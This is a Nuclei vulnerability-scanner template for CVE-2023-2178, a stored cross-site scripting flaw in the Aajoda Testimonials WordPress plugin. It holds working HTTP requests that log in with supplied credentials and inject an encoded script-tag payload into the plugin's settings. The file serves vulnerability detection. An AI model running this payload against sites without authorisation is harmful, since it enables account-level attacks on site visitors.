56 lines
2.4 KiB
YAML
56 lines
2.4 KiB
YAML
id: CVE-2023-2178
|
|
|
|
info:
|
|
name: Aajoda Testimonials < 2.2.2 - Cross-Site Scripting
|
|
author: Farish
|
|
severity: medium
|
|
description: |
|
|
The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
|
|
remediation: |
|
|
Update Aajoda Testimonials plugin to version 2.2.2 or later to mitigate the vulnerability.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/e84b71f9-4208-4efb-90e8-1c778e7d2ebb
|
|
- https://downloads.wordpress.org/plugin/aajoda-testimonials.2.1.0.zip
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-2178
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 4.8
|
|
cve-id: CVE-2023-2178
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00078
|
|
epss-percentile: 0.3232
|
|
cpe: cpe:2.3:a:aajoda:aajoda_testimonials:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: aajoda
|
|
product: aajoda_testimonials
|
|
framework: wordpress
|
|
tags: cve2023,cve,wpscan,wordpress,wp,wp-plugin,xss,authenticated,aajoda
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
|
- |
|
|
POST /wp-admin/options-general.php?page=aajoda-testimonials HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
aajodatestimonials_opt_hidden=Y&aajoda_version=2.0&aajodatestimonials_code=%22%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A&Submit=Save
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code_2 == 200'
|
|
- 'contains(header_2, "text/html")'
|
|
- 'contains(body_2, "></textarea><script>alert(document.domain)</script>")'
|
|
- 'contains(body_2, "page_aajoda-testimonials")'
|
|
condition: and
|
|
# digest: 4b0a00483046022100f93aa3cb6cc2edb0c5997f79575a8da8b4d0cf79e014bca412d5022d9835097d022100fd54e5996ca9f390bfbe63f13565229fc58738c5b04f2eb3e8edaef8f90a37fa:922c64590222798bb761d5b6d8e72950 |